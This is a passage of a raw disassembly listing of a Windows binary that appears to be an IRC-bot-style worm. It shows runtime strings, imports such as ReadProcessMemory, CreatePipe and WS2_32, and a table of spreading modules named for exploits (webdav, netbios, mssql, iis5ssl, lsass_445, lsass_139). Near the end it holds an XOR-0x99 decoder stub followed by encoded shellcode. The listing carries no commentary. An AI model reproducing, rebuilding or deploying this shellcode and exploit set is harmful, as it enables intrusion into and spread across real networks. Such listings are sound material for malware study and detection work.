stru_428FD8 _msEH <0FFFFFFFFh, 0, offset sub_417AB0> ; DATA XREF: sub_417A7E+2�o
align 8
stru_428FE8 _msEH <0FFFFFFFFh, 0, offset sub_417BB0> ; DATA XREF: sub_417B3C+2�o
align 8
stru_428FF8 _msEH <0FFFFFFFFh, 0, offset sub_417D59> ; DATA XREF: sub_417C8D+2�o
dd 2 dup(0)
dd offset sub_417D28
stru_429010 _msEH <0FFFFFFFFh, 0, offset sub_418F3B> ; DATA XREF: sub_418EB7+2�o
align 10h
stru_429020 _msEH <0FFFFFFFFh, 0, offset sub_4195CB> ; DATA XREF: sub_4194B5+2�o
align 10h
dbl_429030 dq 0.0 ; DATA XREF: sub_41965E+6�r
dword_429038 dd 30302B65h, 30h ; DATA XREF: sub_4196D3+52�o
dbl_429040 dq 1.0 ; DATA XREF: sub_4199FC+2A�r
dbl_429048 dq 4.195835e6 ; DATA XREF: sub_4199FC+F�r
dbl_429050 dq 3.145727e6 ; DATA XREF: sub_4199FC+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_419A3C+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_419A3C�o
align 10h
dword_429080 dd 2 dup(0) ; DATA XREF: sub_419C39+1C�o
; sub_41C3E0+1E�o ...
stru_429088 _msEH <0FFFFFFFFh, offset loc_419F32, offset loc_419F36>
; DATA XREF: sub_419C39+2�o
dd 0FFFFFFFFh, 419D2Fh, 419D33h, 0FFFFFFFFh, 419DFDh, 419E01h
dd 0
db 2 dup(0)
word_4290B2 dw 20h ; DATA XREF: sub_41E37C+18�r
; .data:0042D840�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
db 2 dup(0)
word_4292BA dw 20h ; DATA XREF: .data:off_42DEB4�o
aHH_0:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_4294C0 _msEH <0FFFFFFFFh, offset sub_41A012, offset loc_41A016>
; DATA XREF: sub_41A026-2F�o
align 10h
stru_4294D0 _msEH <0FFFFFFFFh, 0, offset sub_41A14E> ; DATA XREF: sub_41A0A1+2�o
align 10h
dd offset loc_41A114
dd offset loc_41A11D
stru_4294E8 _msEH <0FFFFFFFFh, offset sub_41A1A3, offset loc_41A1AC>
; DATA XREF: sub_41A16F+2�o
align 8
stru_4294F8 _msEH <0FFFFFFFFh, 0, offset sub_41A30E> ; DATA XREF: sub_41A1D1+2�o
align 8
dd offset loc_41A256
dd offset loc_41A299
stru_429510 _msEH <0FFFFFFFFh, offset sub_41A4E8, offset loc_41A4EC>
; DATA XREF: sub_41A378+2�o
align 10h
stru_429520 _msEH <0FFFFFFFFh, offset loc_41A8C4, offset loc_41A8C8>
; DATA XREF: sub_41A89F+2�o
align 10h
stru_429530 _msEH <0FFFFFFFFh, offset loc_41A8F1, offset loc_41A8F5>
; DATA XREF: sub_41A8D4+2�o
align 10h
stru_429540 _msEH <0FFFFFFFFh, 0, offset sub_41AC5B> ; DATA XREF: sub_41ABF8+2�o
align 10h
stru_429550 _msEH <0FFFFFFFFh, 0, offset sub_41AF44> ; DATA XREF: sub_41ADFD+2�o
align 10h
stru_429560 _msEH <0FFFFFFFFh, 0, offset sub_41B0D8> ; DATA XREF: sub_41B0A6+2�o
align 10h
stru_429570 _msEH <0FFFFFFFFh, offset loc_41B11D, offset loc_41B121>
; DATA XREF: sub_41B0F0+2�o
align 10h
stru_429580 _msEH <0FFFFFFFFh, offset loc_41B161, offset loc_41B165>
; DATA XREF: sub_41B134+2�o
align 10h
stru_429590 _msEH <0FFFFFFFFh, 0, offset sub_41B270> ; DATA XREF: sub_41B1EC+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_42DFCC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41B3F9+12C�o
; sub_41DFF5+134�o
align 10h
asc_4298C0 db 0Ah ; DATA XREF: sub_41B3F9+110�o
; sub_41DFF5+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41B3F9+FE�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41B3F9+CA�o
; sub_41DFF5+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41B3F9+89�o
; sub_41DFF5+88�o
align 10h
stru_429900 _msEH <0FFFFFFFFh, 0, offset sub_41BF94> ; DATA XREF: sub_41BF10+2�o
align 10h
stru_429910 _msEH <0FFFFFFFFh, 0, offset sub_41C157> ; DATA XREF: sub_41C0B0+2�o
align 10h
stru_429920 _msEH <0FFFFFFFFh, offset loc_41C4B9, offset loc_41C4BD>
; DATA XREF: sub_41C3E0+2�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:0042E1BC�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:0042E1B8�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:0042E1AC�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:0042E1A8�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:0042E1A4�o
aSeptember db 'September',0 ; DATA XREF: .data:0042E1A0�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:0042E19C�o
align 10h
aJuly db 'July',0 ; DATA XREF: .data:0042E198�o
align 4
aJune db 'June',0 ; DATA XREF: .data:0042E194�o
align 10h
aApril db 'April',0 ; DATA XREF: .data:0042E18C�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:0042E188�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:0042E184�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:0042E180�o
aDec db 'Dec',0 ; DATA XREF: .data:0042E17C�o
aNov db 'Nov',0 ; DATA XREF: .data:0042E178�o
aOct db 'Oct',0 ; DATA XREF: .data:0042E174�o
aSep db 'Sep',0 ; DATA XREF: .data:0042E170�o
aAug db 'Aug',0 ; DATA XREF: .data:0042E16C�o
aJul db 'Jul',0 ; DATA XREF: .data:0042E168�o
aJun db 'Jun',0 ; DATA XREF: .data:0042E164�o
aMay db 'May',0 ; DATA XREF: .data:0042E160�o
; .data:0042E190�o
aApr db 'Apr',0 ; DATA XREF: .data:0042E15C�o
aMar db 'Mar',0 ; DATA XREF: .data:0042E158�o
aFeb db 'Feb',0 ; DATA XREF: .data:0042E154�o
aJan db 'Jan',0 ; DATA XREF: .data:0042E150�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:0042E14C�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:0042E148�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:0042E144�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:0042E140�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:0042E13C�o
aMonday db 'Monday',0 ; DATA XREF: .data:0042E138�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:0042E134�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:0042E130�o
aFri db 'Fri',0 ; DATA XREF: .data:0042E12C�o
aThu db 'Thu',0 ; DATA XREF: .data:0042E128�o
aWed db 'Wed',0 ; DATA XREF: .data:0042E124�o
aTue db 'Tue',0 ; DATA XREF: .data:0042E120�o
aMon db 'Mon',0 ; DATA XREF: .data:0042E11C�o
aSun db 'Sun',0 ; DATA XREF: .data:off_42E118�o
align 8
stru_429A48 _msEH <0FFFFFFFFh, 0, offset sub_41CE0B> ; DATA XREF: sub_41CD6E+2�o
align 8
stru_429A58 _msEH <0FFFFFFFFh, 0, offset sub_41CEBC> ; DATA XREF: sub_417E14+5018�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_41CFB8+2D�o
align 10h
stru_429A90 _msEH <0FFFFFFFFh, offset loc_41D015, offset loc_41D023>
; DATA XREF: sub_41CFB8+2�o
align 10h
stru_429AA0 _msEH <0FFFFFFFFh, 0, offset sub_41D6B9> ; DATA XREF: sub_41D674+2�o
align 10h
stru_429AB0 _msEH <0FFFFFFFFh, offset loc_41DEA5, offset loc_41DEA9>
; DATA XREF: sub_41DDD0+2�o
dword_429ABC dd 676F7250h, 3A6D6172h, 20h ; DATA XREF: sub_41DFF5+10D�o
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_41DFF5+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_41DFF5:loc_41E052�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_41DFF5+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_41DFF5+4A�o
align 10h
stru_429C60 _msEH <0FFFFFFFFh, offset loc_41E030, offset loc_41E034>
; DATA XREF: sub_41DFF5+5�o
align 10h
stru_429C70 _msEH <0FFFFFFFFh, 0, offset sub_41E277> ; DATA XREF: sub_41E20D+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_41E283+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_41E283+62�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41E283+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41E283+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41E283+2E�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41EBD1:loc_41ECC0�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41EBD1+D2�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41EBD1+C1�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41EBD1+A7�o
align 10h
stru_429D40 _msEH <0FFFFFFFFh, 0, offset sub_41EFC6> ; DATA XREF: sub_41EE93+2�o
align 10h
stru_429D50 _msEH <0FFFFFFFFh, offset loc_41F600, offset loc_41F604>
; DATA XREF: sub_41F4EA+2�o
dd 0FFFFFFFFh, 41F68Dh, 41F691h
stru_429D68 _msEH <0FFFFFFFFh, offset loc_41F891, offset loc_41F895>
; DATA XREF: sub_41F79A+2�o
dd 0FFFFFFFFh, 41F903h, 41F907h, 0
dword_429D84 dd 2 dup(0) ; DATA XREF: sub_41B0F0+C�o
; sub_41B0F0:loc_41B103�o
dword_429D8C dd 0 ; DATA XREF: sub_41B134+C�o
; sub_41B134:loc_41B147�o
dd 0FFFFFFFFh, 41F9BFh
dword_429D98 dd 19930520h, 1, 429D90h, 4 dup(0) ; DATA XREF: .text:loc_41F9CD�o
dd 29DF0h, 2 dup(0)
dd 2A5A0h, 20000h, 29FCCh, 2 dup(0)
dd 2A5AEh, 201DCh, 5 dup(0)
dd 77E61BE6h, 77E7751Ah, 77F5157Dh, 77E7AC37h, 77E7A099h
dd 77E73C49h, 77F7E300h, 77F7E21Fh, 77E7C706h, 77F53275h
dd 77E70F89h, 77E802FCh, 77E6D75Bh, 77E75CB5h, 77E61BB8h
dd 77E77963h, 77E79D8Ch, 77E7A837h, 77E704FCh, 77E78EAAh
dd 77E75E67h, 77E75D9Eh, 77F51597h, 77F516F8h, 77E77CB7h
dd 77E79424h, 77E794BFh, 77E7F01Ah, 77E61A54h, 77E7C3A5h
dd 77E706B7h, 77E80618h, 77E78147h, 77E7A5FDh, 77E805D8h
dd 77E78B82h, 77E78C81h, 77E793EFh, 77E64106h, 77E64006h
dd 77E74CABh, 77E79F93h, 77E76A60h, 77E71B14h, 77E7166Fh
dd 77E75090h, 77E74D76h, 77E77797h, 77E7011Ah, 77E73CE2h
dd 77E668D9h, 77E70396h, 77E6AD34h, 77E77CCEh, 77E79924h
dd 77E65F4Ch, 77E79C90h, 77E73628h, 77E616B4h, 77E76A2Eh
dd 77E75CEBh, 77E71AFEh, 77E80656h, 77E6BD13h, 77E79D5Bh
dd 77E7C2C4h, 77E7FF65h, 77EB7624h, 77E79CE3h, 77E7727Ah
dd 77E76968h, 77E7513Ch, 77E7C657h, 77E6C29Dh, 77EC7C51h
dd 77E74C59h, 77E76C1Ah, 77E70192h, 77F522F2h, 77E7176Ch
dd 77E7339Ch, 77E7C9E7h, 77E79908h, 77E73FF9h, 77E7FF2Eh
dd 77E7C866h, 77F5722Fh, 77E6167Bh, 77F6183Eh, 77E6177Ah
dd 77E7C938h, 77E72B29h, 77F51587h, 77E77CC4h, 77E79B39h
dd 77E78B61h, 77E7C5B4h, 77E76E0Bh, 77E7C726h, 77E79E34h
dd 77E7980Ah, 77E73196h, 77E6169Ah, 77E7F044h, 77E77405h
dd 77E781F9h, 77E7A13Fh, 77E6C703h, 77E7849Fh, 77E79C3Dh
dd 77EB9A84h, 77E9C5B1h, 77E67702h, 77E7C9E1h, 77E77EE1h
dd 77E7C931h, 77E78406h, 77E641EBh, 0
db 8Dh, 3Fh
dw 71ABh
dd 71AB155Ah, 71AB3ECEh, 71AB5DE2h, 71AB1890h, 71AB1B7Bh
dd 71AB868Dh, 71AB5690h, 71AB1AF4h, 71AB41DAh, 71AB3C22h
dd 71AB12F8h, 71AB1746h, 71AB3E5Dh, 71AB1A6Dh, 71AB1836h
dd 0
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0BEh ; ¾
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aE_0 db 'e',0
aCreatethread db 'CreateThread',0
align 4
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aM_1 db '¬',0
aExitthread db 'ExitThread',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db '‹',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 3
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aV db 'v',0
aDeletecritical db 'DeleteCriticalSection',0
db 5Ch ; \
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db 7Eh ; ~
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 27Fh
aQueryperform_1 db 'QueryPerformanceFrequency',0
db '«',0
aExitprocess db 'ExitProcess',0
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 2
db ',',0
aClosehandle db 'CloseHandle',0
dd 72570376h, 46657469h, 656C69h, 7243004Ah, 65746165h
dd 656C6946h, 1A60041h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 'Á',0
aFindclose db 'FindClose',0
db 'Î',0
aFindnextfilea db 'FindNextFileA',0
db 'Å',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 1F5h
aHeapfree db 'HeapFree',0
align 2
dw 1EFh
aHeapalloc db 'HeapAlloc',0
dw 18Bh
aGetprocessheap db 'GetProcessHeap',0
align 4
db '¸',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 10h
db '·',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
dw 35Eh
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 93h ; “
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 0A8h ; ¨
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 61h ; a
db 2, 4Fh, 70h
aEnprocess db 'enProcess',0
db 'å',0
aFreelibrary db 'FreeLibrary',0
db 43h ; C
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 90h
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 0F1h ; ñ
db 2, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 14Dh
aGetfilesize db 'GetFileSize',0
db 0BFh ; ¿
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 133h
aGetdateformata db 'GetDateFormatA',0
align 4
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aR_0 db 'à',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 0E9h ; é
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 0E2h ; â
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 345h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 44h ; D
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aK_0 db 'K',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 2F5h
aSetfiletime db 'SetFileTime',0
dd 6547014Fh, 6C694674h, 6D695465h, 0AE0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 2EFh
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0B6h ; ¶
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 51h ; Q
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 369h
aWidechartomult db 'WideCharToMultiByte',0
db 1
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 395h
aLstrcmpia db 'lstrcmpiA',0
dw 332h
aTerminatethrea db 'TerminateThread',0
db 4Ah ; J
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 30h ; 0
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
dw 365h
aWaitforsingleo db 'WaitForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 10h
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 26Ch
aPeeknamedpipe db 'PeekNamedPipe',0
aI_1 db 'ˆ',0
aDuplicatehandl db 'DuplicateHandle',0
db '[',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2C8h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 15Dh
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 10h
db 0C8h ; È
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 61h ; a
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 'ê',0
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 10h
db 63h ; c
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1E3h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 1F9h
aHeaprealloc db 'HeapReAlloc',0
db 0ACh ; ¬
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 2B1h
aRtlunwind db 'RtlUnwind',0
dw 19Ch
aGetstartupinfo db 'GetStartupInfoA',0
db 0FDh ; ý
align 2
aGetcommandline db 'GetCommandLineA',0
dw 337h
aTlsfree db 'TlsFree',0
db 0FEh ; þ
db 2, 53h, 65h
aTlasterror_0 db 'tLastError',0
align 4
db 32h ; 2
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 339h
aTlssetvalue db 'TlsSetValue',0
db 38h ; 8
db 3, 54h, 6Ch
aSgetvalue db 'sGetValue',0
dw 336h
aTlsalloc db 'TlsAlloc',0
align 2
dw 1F3h
aHeapdestroy db 'HeapDestroy',0
db 0F1h ; ñ
db 1, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 358h
aVirtualfree db 'VirtualFree',0
db 55h ; U
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 14h
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 5Bh ; [
db 3, 56h, 69h
aRtualprotect db 'rtualProtect',0
align 2
dw 35Dh
aVirtualquery db 'VirtualQuery',0
align 2
dw 220h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 221h
aLcmapstringw db 'LCMapStringW',0
align 2
aI_2 db 'ë',0
aGetacp db 'GetACP',0
align 10h
db 7Ch ; |
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0F1h ; ñ
align 2
aGetcpinfo db 'GetCPInfo',0
db 9Eh ; ž
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 42h ; B
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aU_0 db 'ã',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 13Fh
aGetenvironment db 'GetEnvironmentStrings',0
aF db 'ä',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 41h ; A
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 2FAh
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470150h, 6C694674h, 70795465h, 19F0065h, 53746547h
dd 6E697274h, 70795467h, 4165h, 654701A2h, 72745374h, 54676E69h
dd 57657079h, 30C0000h, 53746553h, 61486474h, 656C646Eh
dd 0DB0000h, 73756C46h, 6C694668h, 66754265h, 73726566h
dd 2020000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 31Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490211h, 52646142h, 50646165h, 7274h, 7349020Eh, 43646142h
dd 5065646Fh, 7274h, 654801FBh, 69537061h, 657Ah, 655302E8h
dd 646E4574h, 6946664Fh, 656Ch
_rdata ends
; Section 3. (virtual address 0002B000)
; Virtual size : 000529D8 ( 338392.)
; Section size in file : 000529D8 ( 338392.)
; Offset to raw data for section: 0002B000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 42B000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_42B000 dd 0 ; DATA XREF: sub_415D8B+40�o
dd offset sub_41DF9F
dword_42B008 dd 0 ; DATA XREF: sub_415D8B+47�o
dword_42B00C dd 0 ; DATA XREF: sub_415D8B+D�o
dd offset sub_417D6B
dd offset sub_41AF4D
dd offset sub_41B07E
dd offset sub_41E185
dword_42B020 dd 0 ; DATA XREF: sub_415D8B+12�o
dword_42B024 dd 0 ; DATA XREF: sub_415DF0:loc_415E5F�o
dd offset sub_417E14
dword_42B02C dd 0 ; DATA XREF: sub_415DF0+74�o
dword_42B030 dd 0 ; CODE XREF: sub_415D49+23�p
; DATA XREF: sub_415DF0:loc_415E7E�o
dd offset sub_41E198
dword_42B038 dd 2 dup(0) ; DATA XREF: sub_415DF0+93�o
aWebdav db 'webdav',0 ; DATA XREF: sub_401967+155�o
align 4
db 2 dup(0)
aWebdav_0 db 'WebDav',0 ; DATA XREF: sub_4125E5+2B2�o
; .text:00412D7D�o ...
align 4
dd 5 dup(0)
dword_42B068 dd 50h ; DATA XREF: sub_401000+1E�r
; sub_4089DC+3DF7�r ...
off_42B06C dd offset sub_4125E5 ; DATA XREF: sub_401967+1F8�r
dword_42B070 dd 0 ; DATA XREF: sub_401000+2E�o
; sub_4125E5+30E�r ...
dword_42B074 dd 1 ; DATA XREF: sub_401141+1E�r
dword_42B078 dd 0 ; DATA XREF: sub_401141:loc_4013DF�r
aNetbios db 'netbios',0
dd 654E0000h, 6F694274h, 73h, 5 dup(0)
dd 8Bh, 414109h, 3 dup(0)
aNtpass db 'ntpass',0
align 10h
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 414109h, 3 dup(0)
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 412AF9h, 0
dd 1, 0
aMssql db 'mssql',0
align 4
dd 534D0000h, 4C5153h, 6 dup(0)
dd 599h, 413B75h, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 41332Eh, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 4134FCh, 0
dd 2 dup(1), 0Fh dup(0)
aLsass_445_1 db 'lsass_445',0
byte_42B22A db 1 ; DATA XREF: sub_4089DC:loc_40C74B�r
; sub_4089DC+3D7B�o
aLsass_139 db 'lsass_139',0
db 1, 2 dup(0)
dd 4 dup(0)
; ---------------------------------------------------------------------------
loc_42B248: ; DATA XREF: .text:00412C0D�o
jmp short loc_42B25A
; =============== S U B R O U T I N E =======================================
sub_42B24A proc near ; CODE XREF: sub_42B24A:loc_42B25A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42B252: ; CODE XREF: sub_42B24A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42B252
jmp short loc_42B25F
; ---------------------------------------------------------------------------
loc_42B25A: ; CODE XREF: .data:loc_42B248�j
call sub_42B24A
loc_42B25F: ; CODE XREF: sub_42B24A+E�j
jo short near ptr dword_42B1DC+1Eh
cwde
cdq
cdq
retn
sub_42B24A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
